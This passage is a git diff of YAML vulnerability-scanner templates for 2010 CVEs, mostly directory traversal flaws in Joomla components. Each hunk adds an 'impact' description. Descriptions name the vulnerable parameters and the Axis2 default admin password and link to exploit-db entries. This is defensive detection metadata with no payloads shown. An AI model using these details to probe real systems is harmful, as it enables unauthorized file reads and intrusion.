impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/10943 
diff --git a/http/cves/2010/CVE-2010-0219.yaml b/http/cves/2010/CVE-2010-0219.yaml index a264be8142..f21b5e1318 100644 --- a/http/cves/2010/CVE-2010-0219.yaml +++ b/http/cves/2010/CVE-2010-0219.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or the ability to modify or delete data. remediation: | Disable or restrict access to the Axis2 web interface, or apply the necessary patches or updates provided by the vendor. reference: diff --git a/http/cves/2010/CVE-2010-0467.yaml b/http/cves/2010/CVE-2010-0467.yaml index d9c63a2666..df5713439a 100644 --- a/http/cves/2010/CVE-2010-0467.yaml +++ b/http/cves/2010/CVE-2010-0467.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage. remediation: Apply all relevant security patches and upgrades. reference: - https://www.exploit-db.com/exploits/11282 diff --git a/http/cves/2010/CVE-2010-0696.yaml b/http/cves/2010/CVE-2010-0696.yaml index d56a13d928..bf8d28d1a5 100644 --- a/http/cves/2010/CVE-2010-0696.yaml +++ b/http/cves/2010/CVE-2010-0696.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter. + impact: | + An attacker can exploit this vulnerability to retrieve arbitrary files from the server. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/11447 diff --git a/http/cves/2010/CVE-2010-0759.yaml b/http/cves/2010/CVE-2010-0759.yaml index 356f8f51cb..139c84a86e 100644 --- a/http/cves/2010/CVE-2010-0759.yaml +++ b/http/cves/2010/CVE-2010-0759.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access or information disclosure. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/11498 diff --git a/http/cves/2010/CVE-2010-0942.yaml b/http/cves/2010/CVE-2010-0942.yaml index 14f7b665fa..e7ff74d1e4 100644 --- a/http/cves/2010/CVE-2010-0942.yaml +++ b/http/cves/2010/CVE-2010-0942.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server. remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/11089 diff --git a/http/cves/2010/CVE-2010-0943.yaml b/http/cves/2010/CVE-2010-0943.yaml index 2cfac5a06e..d6d5a4d6b8 100644 --- a/http/cves/2010/CVE-2010-0943.yaml +++ b/http/cves/2010/CVE-2010-0943.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server. remediation: | Update to the latest version of Joomla! Component com_jashowcase to fix the directory traversal vulnerability. reference: diff --git a/http/cves/2010/CVE-2010-0944.yaml b/http/cves/2010/CVE-2010-0944.yaml index fd05da7897..81174f71a7 100644 --- a/http/cves/2010/CVE-2010-0944.yaml +++ b/http/cves/2010/CVE-2010-0944.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server. remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/11088 
diff --git a/http/cves/2010/CVE-2010-0972.yaml b/http/cves/2010/CVE-2010-0972.yaml index 1f7566b1a3..cf2b104c42 100644 --- a/http/cves/2010/CVE-2010-0972.yaml +++ b/http/cves/2010/CVE-2010-0972.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access or information disclosure. remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/11738 diff --git a/http/cves/2010/CVE-2010-0982.yaml b/http/cves/2010/CVE-2010-0982.yaml index 95e78bfedb..6aaf353b6f 100644 --- a/http/cves/2010/CVE-2010-0982.yaml +++ b/http/cves/2010/CVE-2010-0982.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Allows an attacker to read arbitrary files on the server, leading to potential information disclosure and further exploitation. remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/10942 diff --git a/http/cves/2010/CVE-2010-0985.yaml b/http/cves/2010/CVE-2010-0985.yaml index 876879408c..c16c6ef38c 100644 --- a/http/cves/2010/CVE-2010-0985.yaml +++ b/http/cves/2010/CVE-2010-0985.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution. remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/10948 diff --git a/http/cves/2010/CVE-2010-1056.yaml b/http/cves/2010/CVE-2010-1056.yaml index c18d4f94b9..8f0f782af8 100644 --- a/http/cves/2010/CVE-2010-1056.yaml +++ b/http/cves/2010/CVE-2010-1056.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/11760 diff --git a/http/cves/2010/CVE-2010-1081.yaml b/http/cves/2010/CVE-2010-1081.yaml index 4a6961094a..381ed74c14 100644 --- a/http/cves/2010/CVE-2010-1081.yaml +++ b/http/cves/2010/CVE-2010-1081.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation. remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/11511 diff --git a/http/cves/2010/CVE-2010-1217.yaml b/http/cves/2010/CVE-2010-1217.yaml index 74078c9f09..51e67a76e9 100644 --- a/http/cves/2010/CVE-2010-1217.yaml +++ b/http/cves/2010/CVE-2010-1217.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE -- the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/11814 diff --git a/http/cves/2010/CVE-2010-1219.yaml b/http/cves/2010/CVE-2010-1219.yaml index d199908f5f..4a7117d194 100644 --- a/http/cves/2010/CVE-2010-1219.yaml +++ b/http/cves/2010/CVE-2010-1219.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/11757 diff --git a/http/cves/2010/CVE-2010-1302.yaml b/http/cves/2010/CVE-2010-1302.yaml index f87a80beed..a2e627f573 100644 --- a/http/cves/2010/CVE-2010-1302.yaml +++ b/http/cves/2010/CVE-2010-1302.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access or information disclosure. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/11978 diff --git a/http/cves/2010/CVE-2010-1305.yaml b/http/cves/2010/CVE-2010-1305.yaml index 684a1965c8..9ab18129de 100644 --- a/http/cves/2010/CVE-2010-1305.yaml +++ b/http/cves/2010/CVE-2010-1305.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12065 diff --git a/http/cves/2010/CVE-2010-1306.yaml b/http/cves/2010/CVE-2010-1306.yaml index eb484f39f1..faaf60f701 100644 --- a/http/cves/2010/CVE-2010-1306.yaml +++ b/http/cves/2010/CVE-2010-1306.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12058 diff --git a/http/cves/2010/CVE-2010-1307.yaml b/http/cves/2010/CVE-2010-1307.yaml index 746c9ae464..037258eb10 100644 --- a/http/cves/2010/CVE-2010-1307.yaml +++ b/http/cves/2010/CVE-2010-1307.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12070 diff --git a/http/cves/2010/CVE-2010-1308.yaml b/http/cves/2010/CVE-2010-1308.yaml index 4dcd078cc5..1f04e0156f 100644 --- a/http/cves/2010/CVE-2010-1308.yaml +++ b/http/cves/2010/CVE-2010-1308.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12066 diff --git a/http/cves/2010/CVE-2010-1312.yaml b/http/cves/2010/CVE-2010-1312.yaml index 75dabb124e..2c7dd866b7 100644 --- a/http/cves/2010/CVE-2010-1312.yaml +++ b/http/cves/2010/CVE-2010-1312.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12077 diff --git a/http/cves/2010/CVE-2010-1313.yaml b/http/cves/2010/CVE-2010-1313.yaml index c1b8c445b8..63c45ad01b 100644 --- a/http/cves/2010/CVE-2010-1313.yaml +++ b/http/cves/2010/CVE-2010-1313.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the Joomla! CMS. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12082 diff --git a/http/cves/2010/CVE-2010-1314.yaml b/http/cves/2010/CVE-2010-1314.yaml index 463dc69efc..15be0d45a4 100644 --- a/http/cves/2010/CVE-2010-1314.yaml +++ b/http/cves/2010/CVE-2010-1314.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12086 diff --git a/http/cves/2010/CVE-2010-1315.yaml b/http/cves/2010/CVE-2010-1315.yaml index 6afc40fd4a..e6f371b4ae 100644 --- a/http/cves/2010/CVE-2010-1315.yaml +++ b/http/cves/2010/CVE-2010-1315.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/11999 diff --git a/http/cves/2010/CVE-2010-1340.yaml b/http/cves/2010/CVE-2010-1340.yaml index 1454f31ec2..7efd72eb90 100644 --- a/http/cves/2010/CVE-2010-1340.yaml +++ b/http/cves/2010/CVE-2010-1340.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + The vulnerability allows an attacker to include arbitrary local files, leading to remote code execution or sensitive information disclosure. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/33797 diff --git a/http/cves/2010/CVE-2010-1345.yaml b/http/cves/2010/CVE-2010-1345.yaml index d8967d0bab..5a785fd24a 100644 --- a/http/cves/2010/CVE-2010-1345.yaml +++ b/http/cves/2010/CVE-2010-1345.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/15453 diff --git a/http/cves/2010/CVE-2010-1352.yaml b/http/cves/2010/CVE-2010-1352.yaml index 96840d095a..54ed4d6dc7 100644 --- a/http/cves/2010/CVE-2010-1352.yaml +++ b/http/cves/2010/CVE-2010-1352.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12084 diff --git a/http/cves/2010/CVE-2010-1353.yaml b/http/cves/2010/CVE-2010-1353.yaml index f3daabf11c..c0ddd4da3a 100644 --- a/http/cves/2010/CVE-2010-1353.yaml +++ b/http/cves/2010/CVE-2010-1353.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: | Apply the latest security patches or updates provided by Joomla! to fix the LFI vulnerability in LoginBox component. reference: diff --git a/http/cves/2010/CVE-2010-1354.yaml b/http/cves/2010/CVE-2010-1354.yaml index bdf5759e4b..ffc2c0e178 100644 --- a/http/cves/2010/CVE-2010-1354.yaml +++ b/http/cves/2010/CVE-2010-1354.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12102 
diff --git a/http/cves/2010/CVE-2010-1429.yaml b/http/cves/2010/CVE-2010-1429.yaml index 0f6913faae..e5daba6f03 100644 --- a/http/cves/2010/CVE-2010-1429.yaml +++ b/http/cves/2010/CVE-2010-1429.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Red Hat JBoss Enterprise Application Platform 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 is susceptible to sensitive information disclosure. A remote attacker can obtain sensitive information about "deployed web contexts" via a request to the status servlet, as demonstrated by a full=true query string. NOTE: this issue exists because of a CVE-2008-3273 regression. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to further attacks. remediation: | Apply the necessary patches or updates provided by Red Hat to fix the vulnerability. reference: diff --git a/http/cves/2010/CVE-2010-1461.yaml b/http/cves/2010/CVE-2010-1461.yaml index 5d6536e4eb..04bfedb69c 100644 --- a/http/cves/2010/CVE-2010-1461.yaml +++ b/http/cves/2010/CVE-2010-1461.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php. + impact: | + The LFI vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the Joomla! application. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12232 diff --git a/http/cves/2010/CVE-2010-1469.yaml b/http/cves/2010/CVE-2010-1469.yaml index d1db2b2453..4bd6599f1e 100644 --- a/http/cves/2010/CVE-2010-1469.yaml +++ b/http/cves/2010/CVE-2010-1469.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12146 diff --git a/http/cves/2010/CVE-2010-1470.yaml b/http/cves/2010/CVE-2010-1470.yaml index 6771437e12..aef4752393 100644 --- a/http/cves/2010/CVE-2010-1470.yaml +++ b/http/cves/2010/CVE-2010-1470.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and have possibly other unspecified impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12166 diff --git a/http/cves/2010/CVE-2010-1471.yaml b/http/cves/2010/CVE-2010-1471.yaml index 6691ff24e5..be7d6bab50 100644 --- a/http/cves/2010/CVE-2010-1471.yaml +++ b/http/cves/2010/CVE-2010-1471.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: | Update to the latest version of Joomla! Component Address Book or apply the necessary patches to fix the LFI vulnerability. reference: diff --git a/http/cves/2010/CVE-2010-1472.yaml b/http/cves/2010/CVE-2010-1472.yaml index a6fcf585b5..29bcc494fe 100644 --- a/http/cves/2010/CVE-2010-1472.yaml +++ b/http/cves/2010/CVE-2010-1472.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potentially execute arbitrary code. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12167 diff --git a/http/cves/2010/CVE-2010-1473.yaml b/http/cves/2010/CVE-2010-1473.yaml index ef4a2ff52b..5e742be772 100644 --- a/http/cves/2010/CVE-2010-1473.yaml +++ b/http/cves/2010/CVE-2010-1473.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12171 diff --git a/http/cves/2010/CVE-2010-1474.yaml b/http/cves/2010/CVE-2010-1474.yaml index fa9ce49ac6..3a71203079 100644 --- a/http/cves/2010/CVE-2010-1474.yaml +++ b/http/cves/2010/CVE-2010-1474.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: | Update to the latest version of Joomla! Component Sweetykeeper or apply the necessary patches to fix the LFI vulnerability. reference: diff --git a/http/cves/2010/CVE-2010-1475.yaml b/http/cves/2010/CVE-2010-1475.yaml index 1d1f90edfb..f67daff417 100644 --- a/http/cves/2010/CVE-2010-1475.yaml +++ b/http/cves/2010/CVE-2010-1475.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + The LFI vulnerability can allow an attacker to read arbitrary files on the server, potentially exposing sensitive information or executing malicious code. remediation: | Update to the latest version of Joomla! Component Preventive And Reservation and apply any available patches or fixes to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2010/CVE-2010-1476.yaml b/http/cves/2010/CVE-2010-1476.yaml index 630b46689f..ff2700ea51 100644 --- a/http/cves/2010/CVE-2010-1476.yaml +++ b/http/cves/2010/CVE-2010-1476.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12150 diff --git a/http/cves/2010/CVE-2010-1478.yaml b/http/cves/2010/CVE-2010-1478.yaml index 8e0ff4a512..14b5f48fd7 100644 --- a/http/cves/2010/CVE-2010-1478.yaml +++ b/http/cves/2010/CVE-2010-1478.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12145 diff --git a/http/cves/2010/CVE-2010-1491.yaml b/http/cves/2010/CVE-2010-1491.yaml index 54f60dd657..d6c6761977 100644 --- a/http/cves/2010/CVE-2010-1491.yaml +++ b/http/cves/2010/CVE-2010-1491.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + The LFI vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the Joomla! CMS. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12318 diff --git a/http/cves/2010/CVE-2010-1494.yaml b/http/cves/2010/CVE-2010-1494.yaml index 8a9fadb58a..904a894a02 100644 --- a/http/cves/2010/CVE-2010-1494.yaml +++ b/http/cves/2010/CVE-2010-1494.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12113 diff --git a/http/cves/2010/CVE-2010-1495.yaml b/http/cves/2010/CVE-2010-1495.yaml index 66337f19c8..6ad6acd9de 100644 --- a/http/cves/2010/CVE-2010-1495.yaml +++ b/http/cves/2010/CVE-2010-1495.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12286 diff --git a/http/cves/2010/CVE-2010-1531.yaml b/http/cves/2010/CVE-2010-1531.yaml index a6de5422e5..8e5aefd87f 100644 --- a/http/cves/2010/CVE-2010-1531.yaml +++ b/http/cves/2010/CVE-2010-1531.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12054 diff --git a/http/cves/2010/CVE-2010-1532.yaml b/http/cves/2010/CVE-2010-1532.yaml index 2c091c5017..b993856111 100644 --- a/http/cves/2010/CVE-2010-1532.yaml +++ b/http/cves/2010/CVE-2010-1532.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12118 diff --git a/http/cves/2010/CVE-2010-1533.yaml b/http/cves/2010/CVE-2010-1533.yaml index ec75c49e54..ddabeea490 100644 --- a/http/cves/2010/CVE-2010-1533.yaml +++ 